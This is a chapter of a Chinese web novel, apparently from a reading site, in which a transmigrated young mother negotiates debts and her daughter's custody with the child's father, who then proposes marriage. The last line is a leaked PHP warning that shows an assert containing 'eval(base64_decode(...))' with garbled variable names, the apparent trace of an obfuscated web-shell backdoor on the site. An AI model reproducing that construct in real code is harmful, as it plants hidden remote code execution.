99书盟 > 玄幻小说 > 老公是个女儿控[穿书] > 正文 第6章 第 06 章
    其实叶星澜有想过夏啾啾是他孩子的可能性,只是他觉得这个可能性不大。

    夏啾啾和他长得不像,其次夏江的态度也不像有这一回事,光凭这两点叶星澜就很难说服自己夏啾啾是他的孩子。

    甚至,叶星澜一开始还以为夏江和夏啾啾是苏文燕找来坑骗他的。

    因为这种事苏文燕真的可以做得出来。

    昨天晚上夏江问他希不希望夏啾啾是他的孩子。与其说是不希望,不如说他从没想过夏啾啾真的会是他的孩子。

    叶星澜完完全全没有“喜当爹”的准备,如今得知夏啾啾是他的亲生女儿,叶星澜表面镇静实则内心慌得一批。

    虽然这几年,哦不,是这十几年,苏文燕坑儿子的本事越发精湛,但是她对幼年叶星澜的教育十分正能量,他记事以来就被苏文燕灌输着“要成为一个正直善良的人”的观念。

    苏文燕总是不厌其烦地向小叶星澜教导着“什么事情可以去做、什么事情不可以去做”,哪怕在不开窍的人,都会被潜移默化影响着。

    什么始乱终弃,什么有了孩子就抛弃孩子母亲,这些事情叶星澜是不会去做的,也是苏文燕是绝对绝对不允许的。

    或许叶星澜不仅要“喜当爹”了,还有可能喜提媳妇一个。

    想到这里,叶星澜抬眸看了一下夏江,然后收回了目光。

    叶星澜心想,如果是夏江的话,也不是不可以。

    突然感受到来自叶星澜莫名其妙的眼神的夏江??

    夏江没有叶星澜想的这么多,更没想过和叶星澜发展。

    她昨天很快就消化了自己“喜当妈,以及穿书的事实。

    好在她在原来的世界没有太多的牵挂,于她而言,不过是换了一个身份、换了一个环境继续生活。

    只是,这个身份和这个环境,似乎比她之前的生活都要差一些。

    那些催款账单和借据,真是想想就让人头大;还有那个便宜女儿夏啾啾,她没经验照顾,肯定照顾不好小孩的。

    昨天晚上夏江想了很多,目前最好的情况就是叶星澜愿意帮她还清那些债务,以及愿意抚养夏啾啾。

    这样的话,她就可以毫无牵挂与心理压力,在这个世界继续生活下去。

    夏江露出一副忧心不安、难过的神情,她问叶星澜“小叶先生应该不会逃避作为父亲的责任吧?”

    叶星澜心情有些沉重地表达了自己的态度“自然不会。”

    想到一些其他的事情,叶星澜不好当着苏文燕的面说。

    他只好对夏江说“一些其他的事情,可能我们还要单独谈谈。”

    叶星澜能想到的事情,苏文燕自然也想到了。

    苏文燕看热闹不嫌事儿大,笑着对叶星澜说“都是自己人,有什么不能在这儿说的?”

    叶星澜“…………我不。”

    叶星澜面无表情看着苏文燕。

    苏文燕觉得十分可惜,然而她又不能撬开叶星澜的嘴巴让他说。

    苏文燕知道叶家和赵家有意联姻,前几天叶盛年还和她透底,叶星澜和赵煦雅最快最快这个月就可以订婚了。

    虽然她不喜欢赵煦雅,但是叶星澜要和赵煦雅联姻的话,她也不会有什么意见。

    只是这个节骨眼,叶星澜突然多了一个亲生女儿出来,显然叶星澜和赵煦雅的联姻告吹了。

    叶星澜要处理他和赵煦雅联姻告吹的那些破事,还要处理他和夏江、夏啾啾之间的关系,想想就麻烦。

    苏文燕自小教导叶星澜,以后要成为一个独立的、有担当的男人。

    所以她是不会帮他处理这些破事的,因为太麻烦了,还十分无趣,她宁愿闲得发慌也不想帮他。

    听到叶星澜的拒绝,苏文燕只好假装惋惜地说“那行吧。”

    夏江“…………”

    夏江觉得苏文燕和叶星澜这对母子之间的关系,其实也是奇奇怪怪的。

    不过这个不是她关心的,她听到叶星澜要和自己“单独谈谈”,正中她下怀。

    她也要和叶星澜谈谈,谈谈她欠的那些债务,谈谈关于夏啾啾的去留。

    夏江想都不想就应下来了。

    她对叶星澜说“嗯,我们确实需要单独谈谈。”

    因为已经证实了夏啾啾是叶星澜的孩子,所以苏文燕有照顾好夏啾啾的义务。

    苏文燕听到他们达成一致,似乎要背着她达成什么共识一般,她的心里有些不痛快。

    不过,她还是主动承担起照顾夏啾啾的义务。

    她对他们说“那你们去谈吧,我在这里帮你们看着夏啾啾。”

    夏江十分温柔并且不容抗拒地揪开那位扒拉着她的小东西,哄着她说“啾啾乖,姐姐很快就回来的。”

    夏啾啾撇撇嘴,不乐意,然后伸出小手继续扒拉着夏江。

    夏江低头看着这位撒娇耍赖的小跟屁虫,内心有些无语。

    她突然意识到,如果叶星澜愿意抚养夏啾啾,夏啾啾这边也不好搞定。

    她叹了口气,弯腰抱起夏啾啾,然后有些歉意地向苏文燕一笑,才对叶星澜说“你不介意吧?”

    “单独谈谈”变为了“单独谈谈ith a child”,横竖小孩不懂事,其实也没什么区别。

    叶星澜看了一下夏啾啾,脸上没有什么表情,点头“嗯”了一声。

    叶星澜不是第一次,也不是最后一次感叹夏啾啾长得真的真的和他一点都不像。

    苏文燕看着他们,有种他们是一家三口而她只是局外人的感觉?

    苏文燕也想跟他们一起去,然而显然是不太可能的。

    等他们两人一小孩都上去二楼书房了,苏文燕让管家帮她拨通叶盛年的电话。

    叶家突然多了一个子孙,这种重大事情她自然要提前给叶盛年和叶老爷爷汇报一下的。

    苏文燕心想,接下来的一段时间不会那么无聊了。

    两人一小孩来到昨天的书房,佣人十分贴心地为夏啾啾准备了水果。

    夏啾啾看到又大又红的车厘子,眼睛饿了,饿得发亮,想吃。

    询问过夏江、得要了允许,夏啾啾才拿了两个车厘子过来,分了一个给夏江。

    不过她生病了,夏江不准她吃太多,夏啾啾吃完两个就不敢再吃了。

    她的眼睛一直看着那盘车厘子,那个模样可怜又可爱的,让人忍不住会心一笑,怎么有这么可爱的小孩?

    叶星澜看到夏啾啾的这个模样,抬眸看了看夏江,觉得她们长得虽然很像,可是性格一点都不像。

    夏啾啾的性格不像夏江,也不像他,也是有点意思的。

    夏江看到夏啾啾一副馋嘴的模样,在叶星澜面前多少有些不好意思了,她只好带着歉意对他说“小孩喜欢吃零食。”

    叶星澜淡淡地“嗯”了一声,“没事,啾啾喜欢吃的话可以让佣人再拿一些过来。”

    在夏江怀里的小东西一听,立即点头表示赞许。

    夏江“…………”

    夏江“小叶先生,我们还是谈正事吧。”

    叶星澜点头,说“好,那我们开始谈谈……关于你和夏啾啾的事情吧。”

    夏啾啾听到自己的名字,立马抬头看着叶星澜,眨了眨圆溜溜的大眼睛。

    夏江伸手摸了摸小东西的脑袋,示意她不要乱说话。

    夏啾啾懂夏江的意思,所以就乖巧的窝在夏江的怀里,只是看着叶星澜,什么都没说。

    夏江开始她的表演,微微蹙着眉,一副忧心忡忡局促不安的模样,努力演绎着“为生活所迫”五个字。

    她说“小叶先生,未经您的同意就擅自生下夏啾啾,是我的不对,这几年一直没有找过您,更是我的错。我曾经以为我一个人可以将啾啾抚养长大的,终究是我太天真了,单凭我一个人,根本无法照顾和好夏啾啾。”

    说着,夏江更加觉得在此之前的“夏江”真是个脑残,未婚生子、还妄想一个单身无助的女人可以养大一个孩子?

    夏江骂着“夏江”脑残,对她当时为什么要生夏啾啾、为什么以前不找叶星澜的缘由只字不提。

    别问,问就是她也不知道。

    她继续说“为了给啾啾更好的生活,我只好向别人借钱。”

    夏江十分委婉“这几年借的钱太多了,如今日子快要过不下去了。”

    叶星澜听了她的话,那双修长的眉都皱起来了。

    他没想到她们母女这几年过得如此艰难。

    也对,如果不是日子过得太艰难,或许夏江就不会找他了。

    夏江没听到叶星澜开口,只好继续说“所以我想,如果啾啾回归叶家,物质生活得到了保障,对她的成长会好一些。”

    哦,当然,到时候她欠下的那些钱,他别忘了帮她还。

    毕竟“夏江”帮他养了这么久的孩子,抚养费都不止这点钱了吧?

    叶星澜终于表态了,他表情有些沉重地“嗯”了一声,说“好。”

    他说“我会尽快和我爸妈商量的,看看夏啾啾什么时候上叶家户口。”

    夏江松了口气,正要进一步详谈,她就听到叶星澜更为沉重的声音“至于你的话,结婚证可能还要再等一段时间。”

    夏江愣了,突然有点儿听不懂叶星澜说的话。

    叶星澜说“不过你放心,到时候我会给你补办婚礼的。”

    夏江…………

    夏江??????

Warning: assert() [function.assert]: Assertion "$婐疬寰鳍= eval(base64_decode($嚚戥呷));" failed in E:\Web\99shumeng\modules\article\reader.php on line 2